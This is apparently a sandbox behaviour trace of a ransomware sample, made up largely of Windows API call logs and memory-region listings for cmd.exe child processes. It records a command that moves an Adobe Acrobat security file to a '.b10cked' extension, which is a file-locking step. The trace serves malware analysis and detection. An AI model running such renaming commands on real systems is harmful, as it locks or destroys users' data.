returned 1 [0146.290] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.290] GetFileType (hFile=0x4c) returned 0x1 [0146.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.291] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f0b0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.291] GetFileType (hFile=0x4c) returned 0x1 [0146.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.291] WriteFile (in: hFile=0x4c, lpBuffer=0x16f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f100*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.291] GetFileType (hFile=0x4c) returned 0x1 [0146.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.291] WriteFile (in: hFile=0x4c, lpBuffer=0x16f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f150*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.291] GetFileType (hFile=0x4c) returned 0x1 [0146.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.291] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1a0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.291] GetFileType (hFile=0x4c) returned 0x1 [0146.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.291] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1f0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.291] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0146.291] GetFileType (hFile=0x4c) returned 0x1 [0146.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.291] WriteFile (in: hFile=0x4c, lpBuffer=0x16f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f240*, lpNumberOfBytesWritten=0x16e244*=0x20, lpOverlapped=0x0) returned 1 [0146.291] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.291] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e230 | out: lpNewFilePointer=0x0) returned 1 [0146.292] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.292] ReadFile (in: hFile=0x54, lpBuffer=0x16f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e250, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesRead=0x16e250*=0x200, lpOverlapped=0x0) returned 1 [0146.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.292] GetFileType (hFile=0x4c) returned 0x1 [0146.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.292] GetFileType (hFile=0x4c) returned 0x1 [0146.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.292] WriteFile (in: hFile=0x4c, lpBuffer=0x16f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.292] GetFileType (hFile=0x4c) returned 0x1 [0146.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.292] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f0b0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.292] GetFileType (hFile=0x4c) returned 0x1 [0146.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.292] WriteFile (in: hFile=0x4c, lpBuffer=0x16f100*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f100*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.292] GetFileType (hFile=0x4c) returned 0x1 [0146.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.292] WriteFile (in: hFile=0x4c, lpBuffer=0x16f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f150*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.292] GetFileType (hFile=0x4c) returned 0x1 [0146.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.293] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1a0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.293] GetFileType (hFile=0x4c) returned 0x1 [0146.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.293] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1f0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.293] GetFileType (hFile=0x4c) returned 0x1 [0146.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.293] WriteFile (in: hFile=0x4c, lpBuffer=0x16f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f240*, lpNumberOfBytesWritten=0x16e244*=0x20, lpOverlapped=0x0) returned 1 [0146.293] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.293] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e230 | out: lpNewFilePointer=0x0) returned 1 [0146.293] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.293] ReadFile 
(in: hFile=0x54, lpBuffer=0x16f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e250, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesRead=0x16e250*=0x200, lpOverlapped=0x0) returned 1 [0146.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.293] GetFileType (hFile=0x4c) returned 0x1 [0146.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.293] GetFileType (hFile=0x4c) returned 0x1 [0146.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.293] WriteFile (in: hFile=0x4c, lpBuffer=0x16f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.293] GetFileType (hFile=0x4c) returned 0x1 [0146.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.293] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f0b0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.294] GetFileType (hFile=0x4c) returned 0x1 [0146.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.294] WriteFile (in: hFile=0x4c, lpBuffer=0x16f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f100*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.294] GetFileType (hFile=0x4c) returned 0x1 [0146.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.294] WriteFile (in: hFile=0x4c, lpBuffer=0x16f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f150*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.294] GetFileType (hFile=0x4c) returned 0x1 [0146.294] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0146.294] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1a0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.294] GetFileType (hFile=0x4c) returned 0x1 [0146.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.294] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1f0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.294] GetFileType (hFile=0x4c) returned 0x1 [0146.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.294] WriteFile (in: hFile=0x4c, lpBuffer=0x16f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f240*, lpNumberOfBytesWritten=0x16e244*=0x20, lpOverlapped=0x0) returned 1 [0146.294] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.294] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e230 | out: lpNewFilePointer=0x0) returned 1 [0146.294] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.294] ReadFile (in: hFile=0x54, lpBuffer=0x16f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e250, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesRead=0x16e250*=0x200, lpOverlapped=0x0) returned 1 [0146.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.294] GetFileType (hFile=0x4c) returned 0x1 [0146.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.295] GetFileType (hFile=0x4c) returned 0x1 [0146.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.295] WriteFile (in: hFile=0x4c, lpBuffer=0x16f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, 
lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.295] GetFileType (hFile=0x4c) returned 0x1 [0146.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.295] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f0b0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.295] GetFileType (hFile=0x4c) returned 0x1 [0146.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.295] WriteFile (in: hFile=0x4c, lpBuffer=0x16f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f100*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.295] GetFileType (hFile=0x4c) returned 0x1 [0146.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.295] WriteFile (in: hFile=0x4c, lpBuffer=0x16f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f150*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.295] GetFileType (hFile=0x4c) returned 0x1 [0146.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.295] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1a0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.295] GetFileType (hFile=0x4c) returned 0x1 [0146.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.295] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1f0*, lpNumberOfBytesWritten=0x16e244*=0x50, 
lpOverlapped=0x0) returned 1 [0146.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.296] GetFileType (hFile=0x4c) returned 0x1 [0146.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.296] WriteFile (in: hFile=0x4c, lpBuffer=0x16f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f240*, lpNumberOfBytesWritten=0x16e244*=0x20, lpOverlapped=0x0) returned 1 [0146.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.296] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e230 | out: lpNewFilePointer=0x0) returned 1 [0146.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.296] ReadFile (in: hFile=0x54, lpBuffer=0x16f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e250, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesRead=0x16e250*=0x32, lpOverlapped=0x0) returned 1 [0146.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.296] GetFileType (hFile=0x4c) returned 0x1 [0146.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.296] GetFileType (hFile=0x4c) returned 0x1 [0146.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.296] WriteFile (in: hFile=0x4c, lpBuffer=0x16f060*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesWritten=0x16e244*=0x32, lpOverlapped=0x0) returned 1 [0146.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.296] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e230 | out: lpNewFilePointer=0x0) returned 1 [0146.296] _close (_FileHandle=4) returned 0 [0146.296] FindNextFileW (in: hFindFile=0x1a0e50, lpFindFileData=0x16f2c4 | out: lpFindFileData=0x16f2c4) returned 0 [0146.297] GetLastError () returned 0x12 [0146.297] FindClose (in: hFindFile=0x1a0e50 | out: hFindFile=0x1a0e50) returned 1 [0146.297] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0146.298] _close (_FileHandle=3) 
returned 0 [0146.298] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.298] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0146.298] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.298] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0146.298] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.298] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0146.298] SetConsoleInputExeNameW () returned 0x1 [0146.299] GetConsoleOutputCP () returned 0x1b5 [0146.299] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0146.299] SetThreadUILanguage (LangId=0x0) returned 0x409 [0146.299] exit (_Code=0) Process: id = "206" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ae0" os_pid = "0xb48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\DIRECT~1.ACR\" \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17695 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17696 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" 
Region: id = 17697 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17698 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 17699 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 17700 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17701 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17702 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17703 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 17704 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17821 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17822 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17823 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17824 
start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 17825 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 17826 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 17827 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17828 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17829 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17830 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17831 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17832 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17833 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = 
"gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17834 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17835 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 17836 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17837 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 17838 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 17839 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 17840 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 17841 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 17842 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 17843 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 17844 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Thread: id = 261 os_tid = 0xa80 [0146.203] 
GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28ff4c | out: lpSystemTimeAsFileTime=0x28ff4c*(dwLowDateTime=0x91140cc0, dwHighDateTime=0x1d440a9)) [0146.203] GetCurrentProcessId () returned 0xb48 [0146.203] GetCurrentThreadId () returned 0xa80 [0146.203] GetTickCount () returned 0x2d806 [0146.203] QueryPerformanceCounter (in: lpPerformanceCount=0x28ff44 | out: lpPerformanceCount=0x28ff44*=20299252451) returned 1 [0146.204] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0146.204] __set_app_type (_Type=0x1) [0146.204] __p__fmode () returned 0x76b331f4 [0146.204] __p__commode () returned 0x76b331fc [0146.204] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0146.204] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0146.205] GetCurrentThreadId () returned 0xa80 [0146.205] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa80) returned 0x38 [0146.205] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0146.205] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0146.205] SetThreadUILanguage (LangId=0x0) returned 0x409 [0146.205] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0146.205] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fedc | out: phkResult=0x28fedc*=0x0) returned 0x2 [0146.205] VirtualQuery (in: lpAddress=0x28ff13, lpBuffer=0x28feac, dwLength=0x1c | out: lpBuffer=0x28feac*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0146.205] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28feac, dwLength=0x1c | out: 
lpBuffer=0x28feac*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0146.205] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28feac, dwLength=0x1c | out: lpBuffer=0x28feac*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0146.205] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28feac, dwLength=0x1c | out: lpBuffer=0x28feac*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0146.205] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28feac, dwLength=0x1c | out: lpBuffer=0x28feac*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0146.205] GetConsoleOutputCP () returned 0x1b5 [0146.205] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0146.206] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0146.206] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.206] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0146.206] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.206] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0146.206] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.206] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0146.206] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.206] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0146.206] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.207] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0146.207] GetEnvironmentStringsW () returned 0x3a0240* [0146.207] FreeEnvironmentStringsW (penv=0x3a0240) returned 1 [0146.207] 
